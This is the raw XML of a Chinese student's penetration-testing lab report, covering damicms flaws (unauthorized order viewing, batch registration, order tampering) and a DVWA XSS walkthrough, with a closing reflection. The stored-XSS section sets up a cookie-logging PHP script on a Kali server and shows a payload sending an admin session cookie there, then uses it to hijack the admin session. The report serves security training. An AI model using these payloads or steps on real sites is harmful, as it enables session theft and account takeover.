      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>7.0.0.1/dami/index.php?m=member&amp;a=buylist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:ind w:firstLine="420" w:firstLineChars="20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证据截图：</w:t>
      </w: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4231640" cy="2686685"/>
            <wp:effectExtent l="0" t="0" r="5080" b="1079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5.1.1抓包用户1数据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4030345" cy="2261235"/>
            <wp:effectExtent l="0" t="0" r="8255" b="571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5.1.2抓包用户2数据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3805555" cy="2759075"/>
            <wp:effectExtent l="0" t="0" r="4445" b="317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5.1.3用户2订单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4077970" cy="2744470"/>
            <wp:effectExtent l="0" t="0" r="17780" b="1778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5.1.5可查看用户1订单</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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outlineLvl w:val="1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bookmarkStart w:id="128" w:name="_Toc27310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5.2批量注册漏洞（漏洞级别：中）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="128"/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damicms存在批量注册用户漏洞，攻击者可批量注册用户来进行攻击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漏洞地址：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auto"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>http://37.0.0.1/dami/index.php?s=/Member/register.html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证据截图：</w:t>
      </w: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17340" cy="2486660"/>
            <wp:effectExtent l="0" t="0" r="16510" b="8890"/>
            <wp:docPr id="42" name="图片 42" descr="QQ截图20240703153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QQ截图2024070315353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5.2.1注册界面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1285240"/>
            <wp:effectExtent l="0" t="0" r="13970" b="10160"/>
            <wp:docPr id="43" name="图片 43" descr="QQ截图20240703153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QQ截图202407031536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5.2.2设置用户名称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91940" cy="2499360"/>
            <wp:effectExtent l="0" t="0" r="3810" b="15240"/>
            <wp:docPr id="44" name="图片 44" descr="QQ截图20240703153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QQ截图2024070315375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5.2.3爆破设置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629535"/>
            <wp:effectExtent l="0" t="0" r="5715" b="18415"/>
            <wp:docPr id="45" name="图片 45" descr="QQ截图20240703153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QQ截图202407031539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533650"/>
            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
            <wp:docPr id="46" name="图片 46" descr="QQ截图20240703153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QQ截图2024070315394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5.2.5批量注册成功</w:t>
      </w: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outlineLvl w:val="1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bookmarkStart w:id="129" w:name="_Toc11127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5.3修改商品id漏洞（漏洞级别：高）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="129"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/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damicms存在修改商品id漏洞，攻击者可修改商品id来更改订单。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/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漏洞地址：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:ind w:firstLine="840" w:firstLineChars="400"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>7.0.0.1/dami/index.php?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>s=/Member/dobuy.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:ind w:firstLine="840" w:firstLineChars="40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证据截图：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:ind w:firstLine="840" w:firstLineChars="4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830830"/>
            <wp:effectExtent l="0" t="0" r="5715" b="7620"/>
            <wp:docPr id="47" name="图片 47" descr="QQ截图20240703154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QQ截图202407031543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840" w:firstLineChars="400"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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5.3.1商品提交订单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</w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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391285"/>
            <wp:effectExtent l="0" t="0" r="7620" b="18415"/>
            <wp:docPr id="48" name="图片 48" descr="QQ截图20240703154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QQ截图202407031543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840" w:firstLineChars="400"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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794510"/>
            <wp:effectExtent l="0" t="0" r="10160" b="15240"/>
            <wp:docPr id="49" name="图片 49" descr="QQ截图20240703154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QQ截图202407031544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           5.3.2 id改包前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934845"/>
            <wp:effectExtent l="0" t="0" r="10160" b="8255"/>
            <wp:docPr id="50" name="图片 50" descr="QQ截图2024070315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QQ截图202407031545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           5.3.3 id改包后</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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27655"/>
            <wp:effectExtent l="0" t="0" r="7620" b="10795"/>
            <wp:docPr id="51" name="图片 51" descr="QQ截图2024070315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QQ截图202407031546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           5.3.5 商品最终结算界面</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="400" w:lineRule="exact"/>
        <w:ind w:left="210" w:firstLine="24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6 DVWA靶场xss漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>反射型XSS演示</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:leftChars="200" w:right="0" w:rightChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>1-1、打开DVWA平台，我们把 DVWA Security </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>安全级别调整为LOW后，点击 Submit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2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45380" cy="3578225"/>
            <wp:effectExtent l="0" t="0" r="7620" b="3175"/>
            <wp:docPr id="3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 descr="IMG_25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578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</w:pPr>
      <w:r>
        <w:t>1-2、选择XSS反射型案例，点击XSS (Reflected) （ Vulnerability: Reflected Cross Site Scripting (XSS) ）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="45"/>
      </w:pPr>
      <w:r>
        <w:t>窗体顶端</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="46"/>
      </w:pPr>
      <w:r>
        <w:t>窗体底端</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2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58410" cy="3345815"/>
            <wp:effectExtent l="0" t="0" r="1270" b="6985"/>
            <wp:docPr id="3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 descr="IMG_25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3345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</w:pPr>
      <w:r>
        <w:t> 1-3、XSS反射型页面，在输入框中我们输入JavaScript脚本，验证是否存在反射型输入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="19"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>（1）&lt;script&gt;alert('XSS')&lt;/script&gt;                      //简单弹框（2）&lt;script&gt;alert(document.cookie);&lt;/script&gt;           // 弹出当前登录的cookie信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2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48555" cy="2724150"/>
            <wp:effectExtent l="0" t="0" r="4445" b="3810"/>
            <wp:docPr id="9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6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</w:pPr>
      <w:r>
        <w:t> 注意链接，存在script注入信息：http://localhost:6123/vulnerabilities/xss_r/?name=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>2、DOM型XSS演示</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>同样需要调整DVWA Security </w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="304800" cy="304800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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 安全级别调整为LOW后，点击 Submit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>2-1、选择DOM反射型案例，点击XSS (DOM) （ Vulnerability: DOM Based Cross Site Scripting (XSS)）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2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28565" cy="2315845"/>
            <wp:effectExtent l="0" t="0" r="635" b="635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2315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</w:pPr>
      <w:r>
        <w:t> 2-2、地址中，http://localhost:6123/vulnerabilities/xss_d/?default=English，我们注入XSS代码，default=&lt;script&gt;document.write('&lt;p&gt;张三&lt;/p&gt;');&lt;/script&gt; ，执行后查看下拉选项中是否新增张三的枚举值，如果新增则说明存在XSS注入风险；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2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68240" cy="2403475"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="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IMG_26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</w:pPr>
      <w:r>
        <w:t> 3、存储型XSS注入演示</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>窃取用户的cookie信息并且保存到数据库中；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2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30165" cy="3275965"/>
            <wp:effectExtent l="0" t="0" r="5715" b="635"/>
            <wp:docPr id="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6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3275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3-1、启动kali黑客服务器的应用Apache服务器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切换root权限，启动Apache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010785" cy="1551940"/>
            <wp:effectExtent l="0" t="0" r="3175" b="2540"/>
            <wp:docPr id="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 descr="IMG_25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155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http://192.168.124.128/ 打开，显示Apache2 Debian Default Page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4973320" cy="3984625"/>
            <wp:effectExtent l="0" t="0" r="10160" b="8255"/>
            <wp:docPr id="5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" descr="IMG_25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398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进入 cd  /var/www/html 目录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新增 vi my.php 文件，输入如下命令：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&lt;?php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$cookie=$_GET['cookie']; file_put_contents('cookie.txt',$cookie);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?&gt;&lt;br&gt;代码解读：我们获取cookie的值赋值给$cookie,然后$cookie变量把值存在到cookie.txt 中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赋予 my.php 的数据组权限为 www-data，为啥取这个权限呢，是由于Apache进程是用这个www-data的数据组权限的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# chown www-data:www-data my.php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新增 cookie.txt 文件 ，且赋予文件的所属组权限为  www-data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┌──(root㉿kali)-[/var/www/html]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└─# touch cookie.txt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┌──(root㉿kali)-[/var/www/html]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└─# chown www-data:www-data cookie.txt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最后再重启下Apache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service apache2 restart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3-2、登录DVWA平台，点击XSS (Stored)  （Vulnerability: Stored Cross Site Scripting (XSS) ）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090160" cy="4044315"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="5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 descr="IMG_25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044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打开BurpSuite工具，抓取/vulnerabilities/xss_s提交注册接口后，提交XSS在线的URLencode编码的信息，点击Send，查看数据库插入XSS获取Cookie的代码；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URL编码转换链接：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instrText xml:space="preserve"> HYPERLINK "http://www.urlencode.com.cn/" \t "https://www.cnblogs.com/Teachertao/p/_blank"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t>http://www.urlencode.com.cn/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095240" cy="1992630"/>
            <wp:effectExtent l="0" t="0" r="10160" b="3810"/>
            <wp:docPr id="5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 descr="IMG_25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拦截放行数据：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896610" cy="1480185"/>
            <wp:effectExtent l="0" t="0" r="1270" b="13335"/>
            <wp:docPr id="37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 descr="IMG_26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148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instrText xml:space="preserve"> HYPERLINK "http://localhost:6123/vulnerabilities/xss_s/" \t "https://www.cnblogs.com/Teachertao/p/_blank"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t>http://localhost:6123/vulnerabilities/xss_s/ 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进入 存储型XSS页面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4983480" cy="4040505"/>
            <wp:effectExtent l="0" t="0" r="0" b="13335"/>
            <wp:docPr id="5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6" descr="IMG_26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040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查看数据库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507990" cy="1149985"/>
            <wp:effectExtent l="0" t="0" r="8890" b="8255"/>
            <wp:docPr id="6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7" descr="IMG_26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1149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494655" cy="996950"/>
            <wp:effectExtent l="0" t="0" r="6985" b="8890"/>
            <wp:docPr id="58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8" descr="IMG_26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再次复制链接：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instrText xml:space="preserve"> HYPERLINK "http://localhost:6123/vulnerabilities/xss_s/" \t "https://www.cnblogs.com/Teachertao/p/_blank"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t>http://localhost:6123/vulnerabilities/xss_s/ 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进入 存储型XSS页面，会执行XSS代码，把Cookie存储到kali服务器的Cookie.txt中；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执行会直接跳转到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instrText xml:space="preserve"> HYPERLINK "http://192.168.124.128/my.php?cookie=PHPSESSID=l49mtbhea2ibp87b4h011b0ht0; security=low" \t "https://www.cnblogs.com/Teachertao/p/_blank"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t>http://192.168.124.128/my.php?cookie=PHPSESSID=l49mtbhea2ibp87b4h011b0ht0;%20security=low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end"/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6600190" cy="372110"/>
            <wp:effectExtent l="0" t="0" r="13970" b="8890"/>
            <wp:docPr id="59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" descr="IMG_264"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId57"/>
                    <a:srcRect l="22142" b="-171"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6600190" cy="372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我们再进入kali服务中，查看Cookie是否写入到Cookie.txt 中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208905" cy="975995"/>
            <wp:effectExtent l="0" t="0" r="3175" b="14605"/>
            <wp:docPr id="6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0" descr="IMG_26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97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获取到admin权限的token，此时我们使用smithy角色登录，再拦截篡改Cookie，这样就相当于smithy有admin权限的功能了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instrText xml:space="preserve"> HYPERLINK "http://192.168.31.195:6123/login.php" \t "https://www.cnblogs.com/Teachertao/p/_blank"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2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t>http://192.168.31.195:6123/login.php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fldChar w:fldCharType="end"/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</w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4467225" cy="3848100"/>
            <wp:effectExtent l="0" t="0" r="13335" b="7620"/>
            <wp:docPr id="63" name="图片 11" descr="IMG_266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1" descr="IMG_26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拦截登录接口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（前提需要清理smithy登录前的cookie信息）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312410" cy="1769110"/>
            <wp:effectExtent l="0" t="0" r="6350" b="13970"/>
            <wp:docPr id="57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2" descr="IMG_26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1769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436235" cy="2286000"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:docPr id="6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3" descr="IMG_26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139690" cy="2631440"/>
            <wp:effectExtent l="0" t="0" r="11430" b="5080"/>
            <wp:docPr id="56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4" descr="IMG_26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39690" cy="2631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left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz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现在登录信息为admin信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="400" w:lineRule="exact"/>
        <w:ind w:left="210" w:firstLine="240"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="400" w:lineRule="exact"/>
        <w:ind w:left="210" w:firstLine="301"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="130" w:name="_Toc137206773"/>
      <w:bookmarkStart w:id="131" w:name="_Toc137205541"/>
      <w:bookmarkStart w:id="132" w:name="_Toc18000"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">结    </w:t>
      </w:r>
      <w:bookmarkEnd w:id="130"/>
      <w:bookmarkEnd w:id="131"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>语</w:t>
      </w:r>
      <w:bookmarkEnd w:id="132"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="400" w:lineRule="exact"/>
        <w:ind w:left="210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在本次渗透测试实训中，我深入学习了网络安全攻防技术，通过模拟真实环境下的渗透测试流程，掌握了漏洞挖掘、利用和修复的全过程。实训内容包括信息收集、漏洞扫描（如Nmap、AWVS）、Web渗透（SQL注入、XSS、CSRF等）、权限提升及内网横向移动，并最终形成规范的渗透测试报告。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="400" w:lineRule="exact"/>
        <w:ind w:left="210" w:firstLine="480" w:firstLine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sz w:val="24"/>
        </w:rPr>
        <w:t>此次实训让我深刻认识到网络安全防御的复杂性和重要性。一方面，我学会了如何以攻击者的视角发现系统弱点，提升了漏洞分析和利用能力；另一方面，也意识到企业安全不仅依赖技术，更需要规范的安全运维和持续的风险管理。此外，团队协作和沟通能力在渗透测试中至关重要，清晰的漏洞描述和修复建议能帮助开发</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId13" w:type="default"/>
      <w:footerReference r:id="rId14" w:type="default"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1440" w:right="1797" w:bottom="1440" w:left="1797" w:header="851" w:footer="992" w:gutter="0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210" w:firstLine="210"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="1">
    <w:p>
      <w:pPr>
        <w:ind w:left="210" w:firstLine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framePr w:wrap="around" w:vAnchor="text" w:hAnchor="page" w:x="5398" w:yAlign="top"/>
      <w:ind w:left="210" w:firstLine="210"/>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:rStyle w:val="25"/>
        <w:sz w:val="21"/>
        <w:szCs w:val="21"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="25"/>
        <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
        <w:kern w:val="0"/>
        <w:sz w:val="21"/>
        <w:szCs w:val="21"/>
      </w:rPr>
      <w:t xml:space="preserve">第 </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="25"/>
        <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        <w:kern w:val="0"/>
        <w:sz w:val="21"/>
        <w:szCs w:val="21"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="25"/>
        <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        <w:kern w:val="0"/>
        <w:sz w:val="21"/>
        <w:szCs w:val="21"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="25"/>
        <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        <w:kern w:val="0"/>
        <w:sz w:val="21"/>
        <w:szCs w:val="21"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="25"/>
        <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        <w:kern w:val="0"/>
        <w:sz w:val="21"/>
        <w:szCs w:val="21"/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="25"/>
        <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        <w:kern w:val="0"/>
        <w:sz w:val="21"/>
        <w:szCs w:val="21"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="25"/>
        <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
        <w:kern w:val="0"/>
        <w:sz w:val="21"/>
        <w:szCs w:val="21"/>
      </w:rPr>
      <w:t xml:space="preserve"> 页 共 </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="25"/>
        <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        <w:kern w:val="0"/>
        <w:sz w:val="21"/>
        <w:szCs w:val="21"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="25"/>
        <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        <w:kern w:val="0"/>
        <w:sz w:val="21"/>
        <w:szCs w:val="21"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> NUMPAGES </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="25"/>
        <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        <w:kern w:val="0"/>
        <w:sz w:val="21"/>
        <w:szCs w:val="21"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="25"/>
        <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        <w:kern w:val="0"/>
        <w:sz w:val="21"/>
        <w:szCs w:val="21"/>
      </w:rPr>
      <w:t>13</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="25"/>
        <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        <w:kern w:val="0"/>
        <w:sz w:val="21"/>
        <w:szCs w:val="21"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="25"/>
        <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
        <w:kern w:val="0"/>
        <w:sz w:val="21"/>
        <w:szCs w:val="21"/>
      </w:rPr>
      <w:t xml:space="preserve"> 页</w:t>
    </w:r>
  </w:p>
  <w:p>
    <w:pPr>
      <w:pStyle w:val="14"/>
      <w:ind w:left="210" w:right="360" w:firstLine="18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framePr w:wrap="around" w:vAnchor="text" w:hAnchor="margin" w:xAlign="right" w:y="1"/>
      <w:ind w:left="210" w:firstLine="180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end"/>
    </w:r>
  </w:p>
  <w:p>
    <w:pPr>
      <w:pStyle w:val="14"/>
      <w:ind w:left="210" w:right="360" w:firstLine="1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left="210" w:firstLine="18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left="210" w:firstLine="18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framePr w:wrap="around" w:vAnchor="text" w:hAnchor="page" w:x="5398" w:yAlign="top"/>
      <w:ind w:left="210" w:firstLine="210"/>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:rStyle w:val="25"/>
        <w:sz w:val="21"/>
        <w:szCs w:val="21"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="25"/>
        <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
        <w:kern w:val="0"/>
        <w:sz w:val="21"/>
        <w:szCs w:val="21"/>
      </w:rPr>
      <w:t xml:space="preserve">第 </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="25"/>
        <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        <w:kern w:val="0"/>
        <w:sz w:val="21"/>
        <w:szCs w:val="21"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="25"/>
        <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        <w:kern w:val="0"/>
        <w:sz w:val="21"/>
        <w:szCs w:val="21"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="25"/>
        <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        <w:kern w:val="0"/>
        <w:sz w:val="21"/>
        <w:szCs w:val="21"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="25"/>
        <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        <w:kern w:val="0"/>
        <w:sz w:val="21"/>
        <w:szCs w:val="21"/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="25"/>
        <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        <w:kern w:val="0"/>
        <w:sz w:val="21"/>
        <w:szCs w:val="21"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="25"/>
        <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
        <w:kern w:val="0"/>
        <w:sz w:val="21"/>
        <w:szCs w:val="21"/>
      </w:rPr>
      <w:t xml:space="preserve"> 页 共 </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="25"/>
        <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        <w:kern w:val="0"/>
        <w:sz w:val="21"/>
        <w:szCs w:val="21"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="25"/>
        <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        <w:kern w:val="0"/>
        <w:sz w:val="21"/>
        <w:szCs w:val="21"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> NUMPAGES </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="25"/>
